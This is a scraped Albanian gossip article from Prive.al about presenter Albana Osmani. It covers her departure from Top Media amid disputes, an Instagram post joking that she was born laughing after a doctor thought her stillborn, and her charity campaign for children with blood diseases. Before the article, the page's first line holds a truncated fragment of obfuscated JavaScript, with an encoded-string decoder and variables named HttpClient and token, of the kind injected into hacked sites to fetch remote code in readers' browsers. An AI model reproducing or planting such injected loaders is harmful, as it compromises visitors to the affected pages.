;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Doktori mendoi se kisha lindur e vdekur, Albana Osmani tregon arsyen pse është gjithnjë kaq e buzëqeshur

By

Ditë më parë Prive.al raportoi se prezantuesja Albana Osmani e cila karrierën në ekran e nisi në një moshë fare të re për të shoqëruar shikuesit për vite me radhë në formate të ndryshme, gjithmonë brenda familjes së Top Medias.

Lajmin e ka bërë të ditur portali Syri i cili mes tjerash bën me dije se Osmani do ta hedhë në gjyq televizionin në të cilin punoi për më shumë se 15 vite. Sipas portalit të njejtë, janë larguar pas debateve me Drejtorin Blushi edhe dy regjisorë të cilët kanë punuar në ekran që prej themelimit.

 ‘Po, Albana është detyruar të largohet pas pakënaqësive të shumta. Përkundër faktit se është një prej ikonave të TOP-it, që prej verës së vitit të kaluar, ajo kishte ngelur pa asnjë program për ta prezantuar ndërsa ka prezantuese të reja që po i udhëheqin 2-3 formate paralelisht. Tashmë nga televizioni nuk përkrahet as fushata ‘Ti je një luledielli’ dhe i kanë hequr reklamën e fondacionit nga transmetimi’ – ka deklaruar burimi i rezervuar për Prive.al.

Por pas gjithë ndodhive në jetën e saj profesionale, Albana Osmani ndau në Instagram një postim me një rrëfim mjaft të çuditshëm. Albana kërkon të tregojë se është një njeri I mbushur me pozitivitet dhe këtë e dëshmon fakti që është mjaft e qeshur. “Ndryshe nga të tjetër unë kam lindur duke qeshur. Pasi doktori mendoi se kisha lindur e vdekur, unë nisa të qesh. Nga ai moment, vazhdoj te qesh me atë doktorin budalla”, ka shkruar ajo.

View this post on Instagram

#bornlikethis #love #laugh

A post shared by ALBANA OSMANI (@albanaosmani1) on

Dhe këtë pozitivitet, Albana po e kanalizon tek fushata sensibilizuese “Ti je një luledielli”, përmes së cilës mblidhen para për fëmijët e prekur nga sëmundjet e gjakut. /Prive.al

 

 

­­

 

 

Artikuj të ngjashëm